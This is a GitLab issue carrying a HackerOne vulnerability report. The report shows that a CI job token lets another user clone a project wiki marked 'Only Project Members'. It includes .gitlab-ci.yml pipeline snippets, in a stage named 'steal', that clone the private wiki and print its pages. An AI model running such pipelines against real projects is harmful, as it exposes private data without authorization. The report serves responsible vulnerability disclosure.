Backend: Able to git the wiki despite of the Only Project Members setting
HackerOne report #1075586 by shells3c
on 2021-01-10, assigned to @rchan-gitlab:
Report
Summary
There was a problem by mistake while confirming the patch for the Wiki bug in the past report: #887755, and the fact that the bug is still there! I am able to git private wiki using the CI_JOB_TOKEN
(public project)
Steps to reproduce
- Create a project, set the Wiki visibility to Only Project Members in the setting page:
https://gitlab.com/<user>/<project>/edit
- Login as another user (attacker), create .gitlab-ci.yml in an arbitrary project:
stages:
- steal
test:
stage: steal
script:
- 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git'
- 'cd api.wiki && cat api-doc.md'
- In the pipeline output, you will able to read the content
Examples
- Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home
- Try adding the following in your .gitlab-ci.yml and read the wiki:
stages:
- steal
test:
stage: steal
script:
- 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git'
- 'cd api.wiki'
- 'ls'
- 'cat home.md'
Impact
Able to read the private Wiki of Gitlab projects
How To Reproduce
Please add reproducibility information to this section:
Edited by Mark Nuzzo